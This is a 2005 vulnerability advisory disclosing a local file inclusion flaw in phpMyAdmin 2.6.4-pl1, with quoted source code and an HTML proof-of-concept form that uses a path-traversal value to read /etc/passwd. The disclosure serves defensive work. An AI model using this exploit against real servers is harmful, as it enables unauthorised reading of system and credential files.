-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[phpMyAdmin Local file inclusion 2.6.4-pl1]
Author: Maksymilian Arciemowicz ( cXIb8O3 ).18
Date: 10.10.2005
from SECURITYREASON.COM
- --- 0.Description ---
phpMyAdmin 2.6.4 is a tool written in PHP intended to
handle the administration of MySQL over the Web.
Currently it can create and drop databases,
create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields.
blablabla...
phpMyAdmin is very dangerous script.
- --- 1. Local file inclusion (Critical) ---
File: ./libraries/grab_globals.lib.php
This file is included by many files. Example file index.php
- -index.php--
<?php
/* $Id: index.php,v 2.14 2004/10/19 17:23:09 nijel Exp $ */
// vim: expandtab sw=4 ts=4 sts=4:
/**
* Gets core libraries and defines some variables
*/
require_once('./libraries/grab_globals.lib.php');
require_once('./libraries/common.lib.php');
...
- -index.php--
ok so. In ./libraries/grab_globals.lib.php we have:
- -101-104-grab_globals.lib.php---------
if ( ! empty( $__redirect ) ) {
require('./' . $__redirect);
exit();
} // end if ( ! empty( $__redirect ) )
- -101-104-grab_globals.lib.php---------
But before we have
- -53-67-grab_globals.lib.php-----------
// check if a subform is submitted
$__redirect = NULL;
if ( isset( $_POST['usesubform'] ) ) {
// if a subform is present and should be used
// the rest of the form is deprecated
$subform_id = key( $_POST['usesubform'] );
$subform = $_POST['subform'][$subform_id];
$_POST = $subform;
if ( isset( $_POST['redirect'] )
&& $_POST['redirect'] != basename( $_SERVER['PHP_SELF'] ) ) {
$__redirect = $_POST['redirect'];
unset( $_POST['redirect'] );
} // end if ( isset( $_POST['redirect'] ) )
} // end if ( isset( $_POST['usesubform'] ) )
// end check if a subform is submitted
- -53-67-grab_globals.lib.php-----------
If varible $_POST['usesubform'] exists and is array, that we can created new varibles for $_POST (example $_POST['redirect']).
$subform = $_POST['subform'][$subform_id];
$_POST = $subform;
where array $_POST = array $_POST[subform][1]
that
$_POST['redirect']=$_POST[subform][1][redirect]
and we have local file inclusion.
Example response in html:
- -Exploit---
<CENTER>
<A HREF="http://www.securityreason.com><IMG SRC="http://securityreason.com/gfx/small_logo.png";></A><P>
<FORM action="http://localhost/phpMyAdmin-2.6.4-pl1/index.php"; method=post enctype="multipart/form-data">
<input TYPE="hidden" name="usesubform[1]" value="1">
<input TYPE="hidden" name="usesubform[2]" value="1">
<input TYPE="text" name="subform[1][redirect]" value="../../../../../../../etc/passwd" size=30> File<p>
<input TYPE="hidden" name="subform[1][cXIb8O3]" value="1">
<input TYPE="submit" value="Exploit">
</FORM>
- -Exploit---
Exploit:
http://securityreason.com/achievement_exploitalert/2
- --- 2. Greets ---
sp3x
- --- 3.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG-KEY: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
WWW: http://securityreason.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)
iD8DBQFDSnd/3Ke13X/fTO4RAse3AKCAT3s7bzwySDsGHqYN0+Vm+D+OiwCdFf/T
cvqCRiRlK9XrQGvV3sYxzXQ=
=yoDY
-----END PGP SIGNATURE-----
![http://securityreason.com/gfx/small_logo.png"](http://securityreason.com/gfx/small_logo.png"){kind=link}
